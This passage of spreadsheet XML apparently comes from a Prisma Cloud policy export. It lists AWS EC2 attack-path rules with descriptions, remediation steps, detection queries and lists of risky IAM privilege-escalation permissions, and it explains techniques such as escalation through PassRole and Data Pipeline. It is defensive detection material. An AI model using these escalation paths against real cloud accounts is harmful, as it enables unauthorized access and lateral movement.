      <c r="C1743" s="2" t="inlineStr"/>
      <c r="D1743" t="inlineStr"/>
      <c r="E1743" t="inlineStr"/>
      <c r="F1743" t="inlineStr"/>
      <c r="G1743" t="b">
        <v>1</v>
      </c>
      <c r="H17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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1743" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1743" t="inlineStr">
        <is>
          <t>Data exfiltration risk due to AWS EC2 instance with unusual usage of instance role credentials and s3:GetObject and s3:ListBucket permissions</t>
        </is>
      </c>
      <c r="L1743" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1743" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1743" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1743" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1743" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1743" t="inlineStr"/>
      <c r="R1743" t="inlineStr"/>
      <c r="S1743" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1743" t="b">
        <v>0</v>
      </c>
      <c r="U1743" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1743" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1743" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and granted s3:GetObject and s3:ListBucket permissions.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to get initial access to the instance. EC2 instance with s3:GetObject and s3:ListBucket permissions could further expand the surface of the attacker to gain access to sensitive data stored in s3. Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
Immediate attention is required to review unusual usage activity of instance role credentials and review and remove s3:GetObject and s3:ListBucket permissions.</t>
        </is>
      </c>
      <c r="X1743"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43" t="inlineStr"/>
      <c r="Z1743" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','EC2 with IAM role attached has s3:GetObject and s3:ListBucket permissions')</t>
        </is>
      </c>
      <c r="AA1743" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1743" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:31</t>
        </is>
      </c>
      <c r="AC1743" t="inlineStr"/>
      <c r="AD1743" t="b">
        <v>1</v>
      </c>
      <c r="AE1743" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1743" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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3" t="inlineStr">
        <is>
          <t>4301c6d1-b895-4831-a72e-bc6e927e543f</t>
        </is>
      </c>
      <c r="AI1743" t="inlineStr">
        <is>
          <t>9fa23935-ba2c-481f-bce0-e57cc7976012</t>
        </is>
      </c>
      <c r="AJ1743" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1743" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1744">
      <c r="A1744" t="inlineStr"/>
      <c r="B1744" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1744" s="2" t="inlineStr"/>
      <c r="D1744" t="inlineStr"/>
      <c r="E1744" t="inlineStr"/>
      <c r="F1744" t="inlineStr"/>
      <c r="G1744" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1744" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1744" t="inlineStr">
        <is>
          <t>Potential risk of Cerber Ransomware attack on ports 80/443 due to publicly exposed and vulnerable AWS EC2 Instance (Confluence, CVE-2023-22515, CVE-2023-22518)</t>
        </is>
      </c>
      <c r="L1744" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1744" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1744" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1744" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1744" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1744" t="inlineStr"/>
      <c r="R1744" t="inlineStr"/>
      <c r="S1744" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1744" t="b">
        <v>0</v>
      </c>
      <c r="U1744" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1744" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1744" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known Cerber Ransomware vulnerability on ports 80/443 associated with Atlassian Confluence (CVE-2023-22515 and CVE-2023-22518).
CVE-2023-22515 is a critical vulnerability with a CVSS base score of 10.0, exploited remotely with low complexity, and does not require any privileges or user interaction. This flaw in Confluence allows attackers to create an account with admin privileges and execute arbitrary code.
CVE-2023-22518 shares several similarities with CVE-2023-22515. It also has a critical CVSS base score of 10.0 and can be easily exploited remotely without requiring any privileges or user interaction.
Exploitation of these vulnerabilities poses significant threats to the system's confidentiality, integrity, and availability. They allow attackers to gain complete control and potentially shut down the affected resources. Exploiting these CVEs can enable attackers to deploy Cerber Ransomware and gain complete control over the system.
The AWS EC2 instance being publicly exposed makes it an easy target for attackers to exploit vulnerabilities. If successfully exploited, attackers could deploy Cerber Ransomware, leading to data encryption, exfiltration, and other malicious activities that undermine the confidentiality and integrity of the system.
Immediate attention is required to remediate the Confluence (CVE-2023-22515 and CVE-2023-22518) vulnerabilities and the public exposure reported for the affected AWS EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1744" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict the internet exposure of reported EC2 instances based on your business requirements by modifying security group rules to the trusted IP address.
To modify Security Group rules, perform the following steps:
1. Log in to the AWS Console
2. Navigate to EC2 Dashboard
3. Identify the EC2 instances that you want to restrict Internet access.
4. Click on the Security Group attached to the instance
5. Update inbound rules that allow Internet access (0.0.0.0/0) to the trusted IP address
For more details, see https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/working-with-security-groups.html#updating-security-group-rules
NOTE: When modifying Security group rules, ensure you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update the vulnerable software, see:
https://nvd.nist.gov/vuln/detail/CVE-2023-22515
https://nvd.nist.gov/vuln/detail/CVE-2023-22518</t>
        </is>
      </c>
      <c r="Y1744" t="inlineStr"/>
      <c r="Z1744" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2023-22515','CVE-2023-22518'))</t>
        </is>
      </c>
      <c r="AA1744" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1744" t="inlineStr">
        <is>
          <t>2024-06-10 07:02:51</t>
        </is>
      </c>
      <c r="AC1744" t="inlineStr"/>
      <c r="AD1744" t="b">
        <v>1</v>
      </c>
      <c r="AE1744" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1744" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>525aa073-0463-46cc-aa0d-36a2a435e660</t>
        </is>
      </c>
      <c r="AI1744" t="inlineStr">
        <is>
          <t>e4e6564b-9cd0-487b-962d-2b396cc88aeb</t>
        </is>
      </c>
      <c r="AJ1744" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1744" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1745">
      <c r="A1745" t="inlineStr"/>
      <c r="B1745" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1745" s="2" t="inlineStr"/>
      <c r="D1745" t="n">
        <v>1</v>
      </c>
      <c r="E1745" t="n">
        <v>0</v>
      </c>
      <c r="F1745" t="n">
        <v>0</v>
      </c>
      <c r="G1745" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1745" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1745" t="inlineStr">
        <is>
          <t>Lateral movement and unauthorized IAM actions due to a publicly exposed AWS EC2 instance with IAM management access level permissions</t>
        </is>
      </c>
      <c r="L1745" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1745" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1745" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1745" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1745" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1745" t="inlineStr"/>
      <c r="R1745" t="inlineStr"/>
      <c r="S1745" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1745" t="b">
        <v>0</v>
      </c>
      <c r="U1745" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1745" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1745" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and management access level permissions that could potentially lead to privilege escalation.
Publicly exposed EC2 instance having risky privilege escalation IAM permissions on the instance help the attackers to escalate their privilege and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'iam:AttachGroupPolicy', 'iam:AttachRolePolicy', 'iam:AttachUserPolicy', 'iam:CreatePolicy', 'iam:CreatePolicyVersion', 'iam:DeleteAccountPasswordPolicy', 'iam:DeleteGroupPolicy', 'iam:DeletePolicy', 'iam:DeletePolicyVersion', 'iam:DeleteRolePermissionsBoundary', 'iam:DeleteRolePolicy', 'iam:DeleteUserPermissionsBoundary', 'iam:DeleteUserPolicy', 'iam:DetachGroupPolicy', 'iam:DetachRolePolicy', 'iam:DetachUserPolicy', 'iam:PutGroupPolicy', 'iam:PutRolePermissionsBoundary', 'iam:PutRolePolicy', 'iam:PutUserPermissionsBoundary', 'iam:PutUserPolicy', 'iam:SetDefaultPolicyVersion', 'iam:UpdateAssumeRolePolicy'
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X174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45" t="inlineStr"/>
      <c r="Z1745" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 Instance with IAM policy management permissions')</t>
        </is>
      </c>
      <c r="AA1745" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1745" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC1745" t="inlineStr"/>
      <c r="AD1745" t="b">
        <v>1</v>
      </c>
      <c r="AE1745" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1745" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>c74a1743-28f8-4527-8950-572907de9d17</t>
        </is>
      </c>
      <c r="AI1745" t="inlineStr">
        <is>
          <t>b225551c-40ae-4017-be78-fb54517aff09</t>
        </is>
      </c>
      <c r="AJ1745" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1745" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1746">
      <c r="A1746" t="inlineStr"/>
      <c r="B1746" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1746" s="2" t="inlineStr"/>
      <c r="D1746" t="n">
        <v>11</v>
      </c>
      <c r="E1746" t="n">
        <v>0</v>
      </c>
      <c r="F1746" t="n">
        <v>0</v>
      </c>
      <c r="G1746" t="b">
        <v>1</v>
      </c>
      <c r="H17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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1746" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1746" t="inlineStr">
        <is>
          <t>Credential exposure risk due to a publicly exposed and vulnerable EC2 instance with risky credentials exposure permissions</t>
        </is>
      </c>
      <c r="L1746" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1746" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1746" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1746" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1746" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1746" t="inlineStr"/>
      <c r="R1746" t="inlineStr"/>
      <c r="S1746" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1746" t="b">
        <v>0</v>
      </c>
      <c r="U1746" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1746" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1746" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have credentials exposure permissions.
A publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. EC2 instance with credentials exposure permissions could further expand the surface of the attack and grant access to credentials for critical resources hosted on AWS.
This policy checks for the following risky database management write access permissions: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Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the EC2 instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X174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46" t="inlineStr"/>
      <c r="Z1746" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 with IAM role attached has credentials exposure permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1746" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1746" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1746" t="inlineStr"/>
      <c r="AD1746" t="b">
        <v>1</v>
      </c>
      <c r="AE1746" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1746" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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6" t="inlineStr">
        <is>
          <t>af686e7a-4a66-49c2-a365-a7cad4a7d2a0</t>
        </is>
      </c>
      <c r="AI1746" t="inlineStr">
        <is>
          <t>09b0ef0a-603e-4991-83fe-00bf4e088164</t>
        </is>
      </c>
      <c r="AJ1746" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1746" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1747">
      <c r="A1747" t="inlineStr"/>
      <c r="B1747" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1747" s="2" t="inlineStr"/>
      <c r="D1747" t="inlineStr"/>
      <c r="E1747" t="inlineStr"/>
      <c r="F1747" t="inlineStr"/>
      <c r="G1747" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1747" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1747" t="inlineStr">
        <is>
          <t>Credential exposure risk due to malware in AWS EC2 instance with risky credentials exposure permissions</t>
        </is>
      </c>
      <c r="L1747" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M1747" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1747" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1747" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1747" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1747" t="inlineStr"/>
      <c r="R1747" t="inlineStr"/>
      <c r="S1747" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1747" t="b">
        <v>0</v>
      </c>
      <c r="U1747" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1747" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1747" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected by malware and have credentials exposure permissions.
The detection of grayware or malware within the instance poses a critical security threat, potentially enabling unauthorized access, data compromise, and operational disruption. EC2 instance with credentials exposure permissions could further expand the surface of the attack and grant access to credentials for critical resources hosted on AWS.
This policy checks for the following risky credentials exposure permissions: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Immediate attention is required to remediate the malware reported for the instances as soon as possible and review risky permissions, remove unwanted permissions assigned to the AWS Ec2 instances, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X1747"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47" t="inlineStr"/>
      <c r="Z1747" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('AWS EC2 with IAM role attached has credentials exposure permissions'))</t>
        </is>
      </c>
      <c r="AA1747" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1747" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:11</t>
        </is>
      </c>
      <c r="AC1747" t="inlineStr"/>
      <c r="AD1747" t="b">
        <v>1</v>
      </c>
      <c r="AE1747" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1747" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>8751550a-f274-48e3-952b-b683c98fb0ac</t>
        </is>
      </c>
      <c r="AI1747" t="inlineStr">
        <is>
          <t>8e7ccf0b-5f2e-4248-afe5-3964e442a691</t>
        </is>
      </c>
      <c r="AJ1747" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1747" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1748">
      <c r="A1748" t="inlineStr"/>
      <c r="B1748" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1748" s="2" t="inlineStr"/>
      <c r="D1748" t="inlineStr"/>
      <c r="E1748" t="inlineStr"/>
      <c r="F1748" t="inlineStr"/>
      <c r="G1748" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1748" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1748" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Spring Framework, CVE-2022-22963, CVE-2022-22965]</t>
        </is>
      </c>
      <c r="L1748" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1748" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1748" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1748" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1748" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1748" t="inlineStr"/>
      <c r="R1748" t="inlineStr"/>
      <c r="S1748" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1748" t="b">
        <v>0</v>
      </c>
      <c r="U1748" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1748" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1748" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [Spring Framework, CVE-2022-22963, CVE-2022-22965]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Spring Framework software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Spring Framework [CVE-2022-22963, CVE-2022-22965] vulnerabilities reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X174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1748" t="inlineStr"/>
      <c r="Z1748" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-22963, CVE-2022-22965 - SpringShell) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA1748" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1748" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:32</t>
        </is>
      </c>
      <c r="AC1748" t="inlineStr"/>
      <c r="AD1748" t="b">
        <v>1</v>
      </c>
      <c r="AE1748" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1748" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>25aa55d0-0282-41cb-9831-e48e86dbab97</t>
        </is>
      </c>
      <c r="AI1748" t="inlineStr">
        <is>
          <t>eeb72048-33a6-4cac-8f7a-2fff7a2843c0</t>
        </is>
      </c>
      <c r="AJ1748" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1748" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1749">
      <c r="A1749" t="inlineStr"/>
      <c r="B1749" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1749" s="2" t="inlineStr"/>
      <c r="D1749" t="inlineStr"/>
      <c r="E1749" t="inlineStr"/>
      <c r="F1749" t="inlineStr"/>
      <c r="G1749" t="b">
        <v>1</v>
      </c>
      <c r="H17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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1749" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1749" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with iam:PassRole and Data Pipeline permissions</t>
        </is>
      </c>
      <c r="L1749" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1749" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1749" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1749" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1749" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1749" t="inlineStr"/>
      <c r="R1749" t="inlineStr"/>
      <c r="S1749" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1749" t="b">
        <v>0</v>
      </c>
      <c r="U1749" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1749" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1749" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and privilege escalation permission via PassRole &amp; Data Pipeline permissions.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Attacker with access to the PassRole and Data pipeline permissions can create a new pipeline and pass in a more privileged role. This would allow an adversary to escalate privileges to the more privileged role and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following privilege escalation permissions:
'iam:PassRole', ‘datapipeline:ActivatePipeline', ‘datapipeline:CreatePipeline’, ‘datapipeline:PutPipelineDefinition’
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X174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49" t="inlineStr"/>
      <c r="Z1749" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS IAM policy allows Privilege escalation via PassRole &amp; Data Pipeline permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1749" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1749" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1749" t="inlineStr"/>
      <c r="AD1749" t="b">
        <v>1</v>
      </c>
      <c r="AE1749" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1749" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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49" t="inlineStr">
        <is>
          <t>43096971-2146-4e98-ab6d-95be585fa8d2</t>
        </is>
      </c>
      <c r="AI1749" t="inlineStr">
        <is>
          <t>3b5cfc2f-744a-420d-9ac8-0c4bd1f11edf</t>
        </is>
      </c>
      <c r="AJ1749" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1749" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1750">
      <c r="A1750" t="inlineStr"/>
      <c r="B1750" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1750" s="2" t="inlineStr"/>
      <c r="D1750" t="inlineStr"/>
      <c r="E1750" t="inlineStr"/>
      <c r="F1750" t="inlineStr"/>
      <c r="G1750" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1750" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1750" t="inlineStr">
        <is>
          <t>Remote code execution and lateral movement risk due to publicly exposed AWS EC2 instance with overly permissive IAM role and known exploitable vulnerability [libwebp, CVE-2023-4863]</t>
        </is>
      </c>
      <c r="L1750" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1750" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1750" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1750" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1750" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1750" t="inlineStr"/>
      <c r="R1750" t="inlineStr"/>
      <c r="S1750" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1750" t="b">
        <v>0</v>
      </c>
      <c r="U1750" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1750" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1750" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known exploitable remote code execution vulnerability in libwebp [CVE-2023-4863]. Additionally, these instances have been detected with overly permissive IAM roles, which significantly increases the risk of lateral movement within the infrastructure. 
Remote code execution is a severe security concern, allowing unauthorized users to execute arbitrary code on the targeted system. When combined with excessive permissions, this poses a heightened risk, enabling attackers not only to compromise the vulnerable system but also to move laterally within the environment. 
Immediate attention is required to remediate the libwebp [CVE-2023-4863] vulnerability, review and restrict the IAM role permissions, and address the public exposure of the AWS EC2 instance as soon as possible</t>
        </is>
      </c>
      <c r="X175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1. Identify and access the reported resource affected by CVE-2023-4863
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-4863</t>
        </is>
      </c>
      <c r="Y1750" t="inlineStr"/>
      <c r="Z1750" t="inlineStr">
        <is>
